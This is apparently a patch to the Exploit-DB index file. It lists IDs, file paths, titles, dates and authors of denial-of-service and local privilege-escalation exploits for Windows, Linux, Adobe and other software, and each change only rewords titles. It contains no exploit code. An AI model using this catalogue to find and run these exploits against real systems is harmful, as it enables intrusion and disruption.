22333,platforms/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (1)",2003-03-05,"Paul Szabo",windows,dos,0
22334,platforms/windows/dos/22334.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (2)",2003-03-05,"Paul Szabo",windows,dos,0
@ -3328,7 +3328,7 @@ id,file,description,date,author,platform,type,port
40820,platforms/windows/dos/40820.txt,"UCanCode - Multiple Vulnerabilities",2016-11-23,shinnai,windows,dos,0
25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service",2005-03-05,ports,windows,dos,0
25219,platforms/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service",2005-03-15,dr_insane,windows,dos,0
25231,platforms/windows/dos/25231.txt,"Microsoft Windows Server 2000/2003/XP - Graphical Device Interface Library Denial of Service",2005-03-17,"Hongzhen Zhou",windows,dos,0
25231,platforms/windows/dos/25231.txt,"Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service",2005-03-17,"Hongzhen Zhou",windows,dos,0
25234,platforms/linux/dos/25234.sh,"Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities",2005-03-17,"Michal Zalewski",linux,dos,0
25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0
25259,platforms/windows/dos/25259.py,"Microsoft Windows XP - Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0
@ -3345,7 +3345,7 @@ id,file,description,date,author,platform,type,port
25353,platforms/unix/dos/25353.txt,"IBM Lotus Domino Server 6.5.1 Web Service - Remote Denial of Service",2005-04-06,anonymous,unix,dos,0
25363,platforms/windows/dos/25363.py,"Lan Messenger - sending PM 'UNICODE' Overwrite Buffer Overflow (SEH)",2013-05-11,ariarat,windows,dos,0
25364,platforms/windows/dos/25364.txt,"AN HTTPD - 'CMDIS.dll' Remote Buffer Overflow",2005-04-08,"Tan Chew Keong",windows,dos,0
25383,platforms/windows/dos/25383.pl,"Microsoft Windows Server 2000/XP - Internet Protocol Validation Remote Code Execution (1)",2005-04-12,"Song Liu",windows,dos,0
25383,platforms/windows/dos/25383.pl,"Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)",2005-04-12,"Song Liu",windows,dos,0
25387,platforms/multiple/dos/25387.txt,"Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service",2005-04-12,"Fernando Gont",multiple,dos,0
25388,platforms/multiple/dos/25388.txt,"Multiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service",2005-04-12,"Fernando Gont",multiple,dos,0
25389,platforms/multiple/dos/25389.txt,"Multiple Vendor ICMP Message Handling - Denial of Service",2005-04-12,"Fernando Gont",multiple,dos,0
@ -3424,7 +3424,7 @@ id,file,description,date,author,platform,type,port
26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 - IFRAME Handling Denial of Service",2005-10-05,"Tom Ferris",multiple,dos,0
26336,platforms/multiple/dos/26336.txt,"Oracle Forms - Servlet TLS Listener Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0
26340,platforms/linux/dos/26340.c,"Up-IMAPProxy 1.2.3/1.2.4 - Multiple Unspecified Remote Format String Vulnerabilities",2005-10-10,"Steve Kemp",linux,dos,0
26341,platforms/windows/dos/26341.txt,"Microsoft Windows Server 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)",2005-10-11,anonymous,windows,dos,0
26341,platforms/windows/dos/26341.txt,"Microsoft Windows XP/2000/2003 - MSDTC TIP Denial of Service (MS05-051)",2005-10-11,anonymous,windows,dos,0
26342,platforms/linux/dos/26342.txt,"RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String",2005-10-11,"Tan Chew Keong",linux,dos,0
26382,platforms/linux/dos/26382.c,"Linux Kernel 2.6.x - IPv6 Local Denial of Service",2005-10-20,"Rémi Denis-Courmont",linux,dos,0
26413,platforms/windows/dos/26413.py,"PEiD 0.95 - Memory Corruption (PoC)",2013-06-24,"Debasish Mandal",windows,dos,0
@ -3444,7 +3444,7 @@ id,file,description,date,author,platform,type,port
26648,platforms/linux/dos/26648.c,"Linux Kernel 2.6.x - Time_Out_Leases PrintK Local Denial of Service",2005-11-29,"Avi Kivity",linux,dos,0
26665,platforms/windows/dos/26665.pl,"pcAnywhere 8.0/9.0/11.x - Authentication Denial of Service",2006-01-17,"David Maciejak",windows,dos,0
26666,platforms/linux/dos/26666.c,"CenterICQ 4.20/4.5 - Malformed Packet Handling Remote Denial of Service",2005-11-29,"Wernfried Haas",linux,dos,0
26690,platforms/windows/dos/26690.c,"Microsoft Windows Server 2000/2003/XP - CreateRemoteThread Local Denial of Service",2005-12-01,"Nima Salehi",windows,dos,0
26690,platforms/windows/dos/26690.c,"Microsoft Windows XP/2000/2003 - CreateRemoteThread Local Denial of Service",2005-12-01,"Nima Salehi",windows,dos,0
26710,platforms/multiple/dos/26710.txt,"Apache CXF < 2.5.10 / 2.6.7 / 2.7.4 - Denial of Service",2013-07-09,"SEC Consult",multiple,dos,0
26733,platforms/windows/dos/26733.py,"Jolix Media Player 1.1.0 - '.m3u' Denial of Service",2013-07-10,IndonesiaGokilTeam,windows,dos,0
26749,platforms/linux/dos/26749.c,"Linux Kernel 2.6.x - File Lock Lease Local Denial of Service",2005-12-29,"J. Bruce Fields",linux,dos,0
@ -3586,7 +3586,7 @@ id,file,description,date,author,platform,type,port
28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0
28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos,0
28222,platforms/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0
28227,platforms/windows/dos/28227.txt,"Microsoft Windows Server 2000/XP - Registry Access Local Denial of Service",2006-07-15,"David Matousek",windows,dos,0
28227,platforms/windows/dos/28227.txt,"Microsoft Windows XP/2000 - Registry Access Local Denial of Service",2006-07-15,"David Matousek",windows,dos,0
28228,platforms/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 - CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",hardware,dos,0
28230,platforms/hardware/dos/28230.txt,"Multiple D-Link Routers - UPNP Buffer Overflow",2006-07-17,"Barnaby Jack",hardware,dos,0
28232,platforms/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 - 'FiltNT.SYS' Local Denial of Service",2006-07-17,"Bipin Gautam",windows,dos,0
@ -3657,7 +3657,7 @@ id,file,description,date,author,platform,type,port
28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante - Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0
28816,platforms/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling Denial of Service",2006-10-16,nnp,linux,dos,0
28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - Clspack.exe Local Buffer Overflow",2006-10-16,mmd_000,windows,dos,0
28834,platforms/windows/dos/28834.txt,"Microsoft Windows XP - cmd.exe Buffer Overflow",2006-10-20,"Alberto Cortes",windows,dos,0
28834,platforms/windows/dos/28834.txt,"Microsoft Windows XP - 'cmd.exe' Buffer Overflow",2006-10-20,"Alberto Cortes",windows,dos,0
28852,platforms/hardware/dos/28852.py,"ONO Hitron CDE-30364 Router - Denial of Service",2013-10-10,"Matias Mingorance Svensson",hardware,dos,80
28855,platforms/windows/dos/28855.txt,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)",2013-10-10,metacom,windows,dos,0
28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service",2006-10-24,"Federico Fazzi",windows,dos,0
@ -3683,7 +3683,7 @@ id,file,description,date,author,platform,type,port
29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",windows,dos,0
29236,platforms/windows/dos/29236.html,"Microsoft Internet Explorer 7 - CSS Width Element Denial of Service",2006-12-06,xiam.core,windows,dos,0
29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service",2006-12-15,shinnai,windows,dos,0
29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer - explorer.exe WMV File Handling Denial of Service",2006-12-15,shinnai,windows,dos,0
29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer - 'explorer.exe' .WMV File Handling Denial of Service",2006-12-15,shinnai,windows,dos,0
29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0
29295,platforms/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos,0
29296,platforms/linux/dos/29296.txt,"KDE LibkHTML 4.2 - NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0
@ -3742,7 +3742,7 @@ id,file,description,date,author,platform,type,port
29620,platforms/osx/dos/29620.txt,"Apple Mac OSX 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0
29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0
29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash PoC",2013-11-23,"Akin Tosunlar",windows,dos,0
29659,platforms/windows/dos/29659.pl,"Microsoft Windows Server 2003/XP - Explorer .WMF File Handling Denial of Service",2007-02-25,sehato,windows,dos,0
29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of Service",2007-02-25,sehato,windows,dos,0
29660,platforms/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service",2007-02-25,sehato,windows,dos,0
29664,platforms/windows/dos/29664.txt,"Microsoft Publisher 2007 - Remote Denial of Service",2007-02-26,"Tom Ferris",windows,dos,0
30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 - URL Protocol Format String",2007-06-12,"Nir Rachmel",multiple,dos,0
@ -3811,7 +3811,7 @@ id,file,description,date,author,platform,type,port
30314,platforms/windows/dos/30314.txt,"Yahoo! Messenger 8.1 - Address Book Remote Buffer Overflow",2007-07-16,"Rajesh Sethumadhavan",windows,dos,0
30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 - Multiple Remote Denial of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0
30395,platforms/php/dos/30395.txt,"PHP openssl_x509_parse() - Memory Corruption",2013-12-17,"Stefan Esser",php,dos,0
30397,platforms/windows/dos/30397.txt,"Microsoft Windows Kernel 'win32k.sys' - Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos,0
30397,platforms/windows/dos/30397.txt,"Microsoft Windows Kernel - 'win32k.sys' Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos,0
30401,platforms/php/dos/30401.php,"T1lib - intT1_Env_GetCompletePath Buffer Overflow",2007-07-26,r0ut3r,php,dos,0
30413,platforms/windows/dos/30413.py,"PotPlayer 1.5.40688 - '.avi' File Handling Memory Corruption",2013-12-20,ariarat,windows,dos,0
31464,platforms/windows/dos/31464.pl,"Surgemail 3.8 - IMAP LSUB Command Remote Stack Buffer Overflow",2008-03-21,"Leon Juranic",windows,dos,0
@ -4262,7 +4262,7 @@ id,file,description,date,author,platform,type,port
33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0
33737,platforms/hardware/dos/33737.py,"ZTE / TP-Link RomPager - Denial of Service",2014-06-13,"Osanda Malith",hardware,dos,0
33755,platforms/php/dos/33755.php,"PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0
33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - AVI File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0
33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - .AVI File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0
33775,platforms/windows/dos/33775.py,"Xilisoft Video Converter Wizard - '.yuv' Stack Buffer Overflow",2010-03-19,ITSecTeam,windows,dos,0
33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Request Format String Denial of Service",2010-03-20,Rick2600,windows,dos,0
33800,platforms/multiple/dos/33800.html,"Mozilla Firefox 3.6 - 'gfxTextRun::SanitizeGlyphRuns()' Remote Memory Corruption",2010-03-24,"Jesse Ruderman",multiple,dos,0
@ -4931,7 +4931,7 @@ id,file,description,date,author,platform,type,port
39220,platforms/windows/dos/39220.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts (1)",2016-01-11,"Google Security Research",windows,dos,0
39221,platforms/win_x86-64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win_x86-64,dos,0
39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0
39232,platforms/windows/dos/39232.txt,"Microsoft Windows = devenum.dll!DeviceMoniker::Load() Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0
39232,platforms/windows/dos/39232.txt,"Microsoft Windows - devenum.dll!DeviceMoniker::Load() Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0
39233,platforms/windows/dos/39233.txt,"Microsoft Office / COM Object - 'WMALFXGFXDSP.dll' DLL Planting (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0
39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash (PoC)",2016-01-15,"Abraham Espinosa",windows,dos,0
39371,platforms/osx/dos/39371.c,"Apple Mac OSX - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0
@ -5459,7 +5459,7 @@ id,file,description,date,author,platform,type,port
114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) - Buffer Overflow (SPARC version)",2003-10-27,osker178,solaris,local,0
118,platforms/bsd/local/118.c,"OpenBSD - 'ibcs2_exec' Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0
120,platforms/linux/local/120.c,"TerminatorX 3.81 - Stack Overflow Privilege Escalation",2003-11-13,Li0n7,linux,local,0
122,platforms/windows/local/122.c,"Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0
122,platforms/windows/local/122.c,"Microsoft Windows - ListBox/ComboBox Control Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0
125,platforms/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",bsd,local,0
129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation (PoC)",2003-12-02,"Christophe Devine",linux,local,0
131,platforms/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation",2003-12-05,"Wojciech Purczynski",linux,local,0
@ -5545,7 +5545,7 @@ id,file,description,date,author,platform,type,port
350,platforms/windows/local/350.c,"Microsoft Windows Server 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0
351,platforms/windows/local/351.c,"Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)",2004-07-17,bkbll,windows,local,0
352,platforms/windows/local/352.c,"Microsoft Windows Server 2000 - Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0
353,platforms/windows/local/353.c,"Microsoft Windows Server 2000/XP - Task Scheduler .job Exploit (MS04-022)",2004-07-18,anonymous,windows,local,0
353,platforms/windows/local/353.c,"Microsoft Windows Task Scheduler (Windows XP/2000) - '.job' Exploit (MS04-022)",2004-07-18,anonymous,windows,local,0
355,platforms/windows/local/355.c,"Microsoft Windows Server 2000 - Utility Manager All-in-One Exploit (MS04-019)",2004-07-20,kralor,windows,local,0
367,platforms/osx/local/367.txt,"Apple Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local,0
368,platforms/windows/local/368.c,"Microsoft Windows XP - Task Scheduler '.job' Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0
@ -5745,8 +5745,8 @@ id,file,description,date,author,platform,type,port
1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (1)",2006-05-19,Devil-00,windows,local,0
40336,platforms/win_x86-64/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0
1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)",2006-05-26,nitr0us,linux,local,0
1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
1911,platforms/windows/local/1911.c,"Microsoft Windows Server 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
1910,platforms/windows/local/1910.c,"Microsoft Windows - NtClose DeadLock PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
1911,platforms/windows/local/1911.c,"Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - (Long Filename) Buffer Overflow",2006-06-15,c0rrupt,windows,local,0
1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,multiple,local,0
1944,platforms/windows/local/1944.c,"Microsoft Excel - Unspecified Remote Code Execution",2006-06-22,"naveed afzal",windows,local,0
@ -6017,7 +6017,7 @@ id,file,description,date,author,platform,type,port
6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0
6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local '.m3u' File Stack Buffer Overflow",2008-09-06,"fl0 fl0w",windows,local,0
6705,platforms/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0
6757,platforms/windows/local/6757.txt,"Microsoft Windows Server 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",windows,local,0
6757,platforms/windows/local/6757.txt,"Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",windows,local,0
6787,platforms/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Stack Buffer Overflow",2008-10-19,"Guido Landi",windows,local,0
6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
6825,platforms/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0
@ -6392,7 +6392,7 @@ id,file,description,date,author,platform,type,port
10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local,0
10353,platforms/windows/local/10353.pl,"Audio Workstation - '.pls' Local Buffer Overflow (SEH)",2009-09-24,germaya_x,windows,local,0
10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - '.pls' Universal Local Buffer Overflow",2009-12-09,mr_me,windows,local,0
10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local,0
10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (1)",2009-12-09,dookie,windows,local,0
10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (1)",2009-12-10,germaya_x,windows,local,0
10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (1)",2009-12-10,"loneferret germaya_x",windows,local,0
10374,platforms/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700 - Exploit",2009-12-10,"Vinod Sharma",windows,local,0
@ -6785,7 +6785,7 @@ id,file,description,date,author,platform,type,port
16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0
16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0
40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
16503,platforms/windows/local/16503.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0
16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16546,platforms/windows/local/16546.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,local,0
@ -6793,7 +6793,7 @@ id,file,description,date,author,platform,type,port
16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0
16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 - _Marshaled_pUnk Code Execution (Metasploit)",2011-01-08,Metasploit,windows,local,0
16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)",2010-06-15,Metasploit,windows,local,0
16606,platforms/windows/local/16606.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
16606,platforms/windows/local/16606.rb,"Adobe - 'Collab.getIcon()' Buffer Overflow (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (1)",2010-09-20,Metasploit,windows,local,0
16615,platforms/windows/local/16615.rb,"Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)",2010-04-30,Metasploit,windows,local,0
16617,platforms/windows/local/16617.rb,"VUPlayer - '.m3u' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
@ -6802,7 +6802,7 @@ id,file,description,date,author,platform,type,port
16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)",2011-01-08,Metasploit,windows,local,0
16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0
16622,platforms/windows/local/16622.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16623,platforms/windows/local/16623.rb,"Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16623,platforms/windows/local/16623.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16624,platforms/windows/local/16624.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16625,platforms/windows/local/16625.rb,"Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)",2010-09-25,Metasploit,windows,local,0
16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-01-28,Metasploit,windows,local,0
@ -6832,7 +6832,7 @@ id,file,description,date,author,platform,type,port
16658,platforms/windows/local/16658.rb,"VUPlayer - '.cue' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16659,platforms/aix/local/16659.rb,"Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)",2010-11-24,Metasploit,aix,local,0
16660,platforms/windows/local/16660.rb,"Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (MS11-006) (Metasploit)",2011-02-08,Metasploit,windows,local,0
16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
@ -6852,7 +6852,7 @@ id,file,description,date,author,platform,type,port
16678,platforms/win_x86/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,local,0
16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,local,0
16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16681,platforms/windows/local/16681.rb,"Adobe - 'Collab.getIcon()' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)",2010-12-16,Metasploit,windows,local,0
16683,platforms/windows/local/16683.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0
16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
@ -6985,7 +6985,7 @@ id,file,description,date,author,platform,type,port
18143,platforms/windows/local/18143.rb,"Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038) (Metasploit)",2011-11-22,Metasploit,windows,local,0
18147,platforms/linux/local/18147.c,"bzexe (bzip2) - Race Condition",2011-11-23,vladz,linux,local,0
18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",windows,local,0
18176,platforms/windows/local/18176.py,"Microsoft Windows Server 2003/XP - 'afd.sys' Privilege Escalation (MS11-080)",2011-11-30,ryujin,windows,local,0
18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (MS11-080)",2011-11-30,ryujin,windows,local,0
18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow SEH Exploit (Metasploit)",2011-11-30,Rh0,windows,local,0
18184,platforms/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0
18186,platforms/windows/local/18186.rb,"StoryBoard Quick 6 - Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0
@ -7169,7 +7169,7 @@ id,file,description,date,author,platform,type,port
19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 startmidi - Exploit",1997-02-09,"David Hedley",irix,local,0
19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 Systour and OutOfBox - Exploits",1996-10-30,"Tun-Hui Hu",irix,local,0
19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 xfsdump - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0
19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",windows,local,0
